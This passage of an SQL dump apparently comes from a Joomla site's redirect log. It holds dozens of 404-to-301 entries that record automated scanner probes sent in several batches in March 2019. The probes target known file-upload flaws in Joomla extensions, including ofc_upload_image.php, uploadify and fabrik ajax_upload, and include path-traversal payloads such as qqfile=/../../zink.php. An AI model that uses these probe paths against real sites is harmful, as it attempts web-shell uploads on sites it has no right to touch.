00:00:00',301),(22522,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:39','0000-00-00 00:00:00',301),(22523,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:40','0000-00-00 00:00:00',301),(22524,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:41','0000-00-00 00:00:00',301),(22525,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:41','0000-00-00 00:00:00',301),(22526,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:26:42','0000-00-00 00:00:00',301),(22527,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-30 23:26:42','0000-00-00 00:00:00',301),(22528,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-30 23:26:43','0000-00-00 00:00:00',301),(22529,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-30 23:26:46','0000-00-00 00:00:00',301),(22530,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-30 23:26:46','0000-00-00 00:00:00',301),(22531,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-30 23:26:47','0000-00-00 00:00:00',301),(22532,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjew-e186rhahujv54khvdmba84chawcpwbmdo&amp;usg=aovvaw3lbd1eo9kwyqvdvjcll0sz//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-30 23:26:48','0000-00-00 00:00:00',301),(22533,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-30 23:38:29','0000-00-00 00:00:00',301),(22534,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:38:30','0000-00-00 00:00:00',301),(22535,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:38:31','0000-00-00 00:00:00',301),(22536,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-30 23:38:32','0000-00-00 00:00:00',301),(22537,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:33','0000-00-00 00:00:00',301),(22538,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:33','0000-00-00 00:00:00',301),(22539,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:34','0000-00-00 00:00:00',301),(22540,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:34','0000-00-00 00:00:00',301),(22541,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:35','0000-00-00 00:00:00',301),(22542,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:36','0000-00-00 00:00:00',301),(22543,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:36','0000-00-00 00:00:00',301),(22544,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:37','0000-00-00 00:00:00',301),(22545,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:37','0000-00-00 00:00:00',301),(22546,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:38','0000-00-00 00:00:00',301),(22547,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:38','0000-00-00 00:00:00',301),(22548,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:38:39','0000-00-00 00:00:00',301),(22549,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-30 23:38:40','0000-00-00 00:00:00',301),(22550,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-30 23:38:41','0000-00-00 00:00:00',301),(22551,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-30 23:38:43','0000-00-00 00:00:00',301),(22552,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-30 23:38:44','0000-00-00 00:00:00',301),(22553,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-30 23:38:44','0000-00-00 00:00:00',301),(22554,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjn-ek286rhahunrp4khxhlax04hhawckqbmcy&amp;usg=aovvaw0fvmnup9wrxhnxtyzfri9q//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-30 23:38:45','0000-00-00 00:00:00',301),(22555,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-30 23:42:19','0000-00-00 00:00:00',301),(22556,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:42:19','0000-00-00 00:00:00',301),(22557,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:42:21','0000-00-00 00:00:00',301),(22558,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-30 23:42:22','0000-00-00 00:00:00',301),(22559,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:23','0000-00-00 00:00:00',301),(22560,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:23','0000-00-00 00:00:00',301),(22561,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:24','0000-00-00 00:00:00',301),(22562,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:24','0000-00-00 00:00:00',301),(22563,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:25','0000-00-00 00:00:00',301),(22564,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:25','0000-00-00 00:00:00',301),(22565,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:26','0000-00-00 00:00:00',301),(22566,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:27','0000-00-00 00:00:00',301),(22567,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:27','0000-00-00 00:00:00',301),(22568,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:28','0000-00-00 00:00:00',301),(22569,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:28','0000-00-00 00:00:00',301),(22570,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:42:29','0000-00-00 00:00:00',301),(22571,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-30 23:42:30','0000-00-00 00:00:00',301),(22572,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-30 23:42:30','0000-00-00 00:00:00',301),(22573,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-30 23:42:33','0000-00-00 00:00:00',301),(22574,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-30 23:42:33','0000-00-00 00:00:00',301),(22575,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-30 23:42:34','0000-00-00 00:00:00',301),(22576,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewi0ykw386rhahxwi54kht42a_i4kbawchswha&amp;usg=aovvaw1twlcn9lev2vcy9uhvfnlo//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-30 23:42:35','0000-00-00 00:00:00',301),(22577,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-30 23:45:43','0000-00-00 00:00:00',301),(22578,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:45:44','0000-00-00 00:00:00',301),(22579,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:45:45','0000-00-00 00:00:00',301),(22580,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-30 23:45:46','0000-00-00 00:00:00',301),(22581,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:47','0000-00-00 